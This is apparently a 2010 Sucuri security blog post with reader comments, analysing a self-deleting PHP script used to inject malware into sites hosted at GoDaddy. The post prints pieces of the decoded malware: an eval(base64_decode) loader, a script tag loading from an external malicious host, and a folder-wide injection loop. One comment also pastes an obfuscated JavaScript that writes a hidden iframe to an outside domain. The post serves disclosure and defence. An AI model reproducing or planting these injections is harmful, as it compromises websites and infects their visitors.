Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, K evin Reville, got tired of getting hacked and setup a cron script to monitor his site and alert him when new files were added.

What did he found? He found the malware used by the attackers to infect everyone.

Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64 decoded file that looks like this: (see it in full MW:SIPRO:1)

eval(base64_decode(“DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3….

Decoded, this is what it does: (see the full content here)

1-First, removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2-Encodes the javascript:

$cod=base64_encode(‘< script src=”http://holasionweb.com/oo.php”>
$to_pack=’if(function_exists(\’ob_start\’)&&!isset($GLOBALS[\’mr_n..

3-Scan all directories and add the malware to all php files. After that, prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo “Working with $val\n”;
$start_time=microtime(true);
if ($val!=””)inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo “|Injected| $totalinjected files in $end_time seconds\n”;

So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Ryan

    I just called GoDaddy (again) to verify that the problem has been solved. The polite tech guy said that the issue had been fixed on their end, but urged me to call immediately if I noticed the attack again.

    I've been very disappointed with their response since Saturday.

  • http://www.danielansari.com Daniel

    I'd like to know what they did to fix it. If they fixed it, then that means they discovered how the initial php file got injected, and we all want to know that, too!

  • http://www.danielansari.com Daniel

    It would be great if GoDaddy could look at their Apache log files and see if there's a pattern of the IP addresses requesting the PHP infection script. Perhaps the perpetrator of these crimes could be found. I'm sure they would be using methods to hide though, such as requesting the script from innocent client machines.

  • Anonymous

    In my case I had already captured and decoded the same file.

    File was named rheba_jacqueline.php and my wordpress was running the latest version 2.9.2

  • Anonymous

    I found the same thing called him_vivie.php it was injected then deleted the night before the attack.

  • Anonymous

    Can you post a step by step to create a cron job on GoDaddy to do the fix? I think this might help in the interim that GoDaddy can't do anything about it.

  • Anonymous

    i have found the similar kind of file request , i searched for the file but couldn't find the file though it was mentioned in my log .

  • http://www.blogger.com/profile/07967171952551962859 Dan Thornton

    I've had one WordPress blog infected, so made sure the problem was solved asap, and then made sure all sites were updated to the latest software, and all passwords were changed in advance of deleting and reinstalling all files this weekend.

    And today I've found my main blog has been hit. Really not happy – not with the fact these things can happen, but that there hasn't been more effort to find a viable prevention as yet…

  • Anonymous

    For the third time… Thank You! You guys have saved my butt. It is unbelievable to me that the company that I am actually paying isn't looking out for it's own customers as much as Sucuri is.

  • Anonymous

    Thank you THANK YOU! At least SOMEBODY is doing something real here!! This is the BEST site out there on all of this!

    What the freaking F is wrong with GoDaddy??

    Just last night I got this once again from them via email: "We continue to investigate the root cause of this issue."

    The title of THEIR email was: "Hosting – WordPress Compromise". Yeah, right. It's NOT just WordPress. And YES, I have 2.9.2.

    It's been a MONTH with three attacks in my account and they are still trying to determine what happened on THEIR servers?

    The fact that an attacker could just drop in a new file anytime on their servers, run it, and then delete it tells me all I need to know…

    unFREAKINGbelievable. Heads have got to roll there and they have GOT to tell the whole truth about what's been happening and whether/how they fixed it – or I don't think anybody will EVER trust them again. They have handled this stupendously poorly IMO and these are our businesses here.

  • Anonymous

    Maybe Godaddy needs to invest in security technology instead of Parties, Indy Cars and Super Bowl Ads for a while.

  • Anonymous

    Thanks for the update on the situation. I run a NON-wordpress site and this exact injection has happened 3 times in the past month.

    I called GoDaddy and they insisted it was a problem in my code. Although I knew they were wrong, there was really nothing I could do.

    So since then I've been removing the injections in every php file (30+) each time it happens. I just found this automated tool to do it though, so hopefully others will find this useful…

    —————————-

    http://theandystratton.com/downloads/godaddy_hack_fix.php.txt

    courtesy of andy stratton…

    here is the info on how to use it:

    Fixing the GoDaddy Hosting base64 Malware Hack

    I have created a very simple script to allow you to sniff for these files recursively and remove the first line of any files whose first line contains the string: >?php /**/ eval(base64_decode(

    This should clear things up, but I offer no guarantee or warranty and am not liable for what this file does. It’s simply a fix I used on a few client sites.

    Download the Fix —> http://theandystratton.com/downloads/godaddy_hack_fix.php.txt

    Instructions:

    1. Download the GoDaddy Hosting Malware Hack fix —> http://theandystratton.com/downloads/godaddy_hack_fix.php.txt
    2. Rename the file godaddy_hack_fix.php and upload to your document root.
    3. Visit the file in a browser, e.g. http://yourdomain.com/godaddy_hack_fix.php
    4. Review the location and number of files that are assumed infected and back them up (download them to your local machine in case of catastrophy)
    5. At the bottom of the script’s output, there’s a "Fix Files" button. If you’re ready, press it and wait. It will tell you when it’s removed the malicious first line from the files.
    6. I’d follow up by personally checking a few random files to ensure you seem right.

    This is a quick fix, but not complete. You should ideally remove and update from a back up, but let’s face it, most of us actually back things up. It’s human nature.

    Much love. Let me know if this helped you out.

  • Anonymous
  • http://bourgy.com Bourgy

    I think we should all link sucuri on a site of ours

  • Anonymous

    I would also suggest voicing your concerns regarding GoDaddy's responsiveness and accusations, or lack there of, at their community forums:

    http://community.godaddy.com/groups/web-hosting/forum/

  • http://bourgy.com Bourgy

    BTw, I linked GoDaddy support to this page and they sent me a reply asking for my PIN number.

    Uhh, right?

    I like GoDaddy, but they should have realized this is issue would drain the patience of most people.

  • Anonymous

    A thread was started on the Go Daddy Community Forums with the same topic title as this blog post. It was responded to by ScottG, a Go Daddy employee, with the same Go Daddy vagueness then it was deleted. There were several posts on the thread before it was deleted.

  • http://www.blogger.com/profile/11278614492905242431 Caitlin

    Don't bother posting on GoDaddy's forum. They really don't care. I was reading through some the posts relating to the malware attack and it's the same tired "it's your fault, you're just stupid" posts by GoDaddy staff blaming their users.

  • http://www.blogger.com/profile/07788723951652931263 Kathy

    The fix, I believe, is to write a script in PERL and use regular expressions to remove the malicious code. That requires SHELL access and permission to run scripts. I have a guy working on it. Let me know if you want to employ his help.

  • Anonymous

    David/Kevin,

    Thank you very much. Does anyone know if the WP database is altered or injected by these GoDaddy attacks? I've checked mine thoroughly and found nothing so far.

    My guess is, if this is a general hack for all PHP sites then it doesn't care and is not affecting specific CMS databases.

  • http://www.danielansari.com Daniel

    It appears to be a general PHP hack – it hasn't affected my Joomla database.

    @Kathy, if you go to my site I have a PHP script that does the cleanup without leaving a blank line at the top of your files; you don't need shell access to run it.

  • Anonymous

    [What is left is an internal problem at GoDaddy.]
    –and every other linux/cpanel/php hosting provider.

    The real problem is uninformed users who cannot resist installing "cool plugin of the week". How many of these plugin/extension writers are directly involved in spam/botnet activity?

    Here is an example of where the real problem is:
    http://docs.joomla.org/Vulnerable_Extensions_List

  • Anonymous

    @Anonymous 7:05 PM

    …as uniformed as that statement? LMAO.

  • Anonymous

    Found the same file (different name – "according_fritz.php") on my godaddy server when looking through the History tab yesterday.

    I tried to decode the base 64 file to no avail — glad someone got it to be legible.

  • Anonymous

    For those blaming WP plugins, etc. (including Godaddy support) This has NOTHING to do with WordPress or any other CMS code! Our simple coded from scratch site with PHP extensions has been hacked twice same as all the rest. Godaddy is aware of this, but they continue to try to deflect the blame onto others. They even lie. They deleted a file from my site that had "good" base 64 encoded code, then claimed they didn't do it.
    I think the GoDaddy girls do more for them than just look sexy. I think that they are responsible for Godaddy security and customer service also!

  • Anonymous

    This is the third time my site has been hacked within 20 days.Godday is not doing anything or they don't have the right person to control the situation.This way our websites future is in danger.Hope some way come out with solution.

  • Anonymous

    As a web developer, the majority of my 56 sites online have been hacked the last couple of weeks…. but, they are spread across 11 different hosting companies, and are on both Linux and Windows servers My only WordPress site was hacked on May 12th, but all my BlogEngine.net sites (asp.net) have also been hacked. This is not just a PHP problem or a GoDaddy problem.

  • Anonymous

    Guys this is the code which i fond on my webpage online running… ofline is deleted by antivirus

    ""

  • Anonymous

    its a php code like this eval(base64_decode……………………..:/>
    which is a virus script.
    i found it on the webpage..online

  • Anonymous

    Hello Guys,

    I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It's and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.

  • http://www.blogger.com/profile/05491250085131877193 morallydecrepit

    I asked GoDaddy for some logs so I could look at them myself and they said they couldn't do that. Right now I've just been checking my site every couple of days. But I still haven't figure out how they get in. I just delete all the hacked code from my php files.

  • Pingback: Tweets that mention Found code used to inject the malware at GoDaddy | Sucuri -- Topsy.com

  • http://twitter.com/XpertDevelopers @XpertDevelopers

    Hi,
    My files get infected with below code..
    Its a javascript code. Fix at this url is not working for me.. http://sucuri.net/malware/helpers/wordpress-fix_p
    Injected code is looks like below:
    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!– uy7gdr5332rkmn –>

  • Pingback: GoDaddy On The Run From PHP Attackers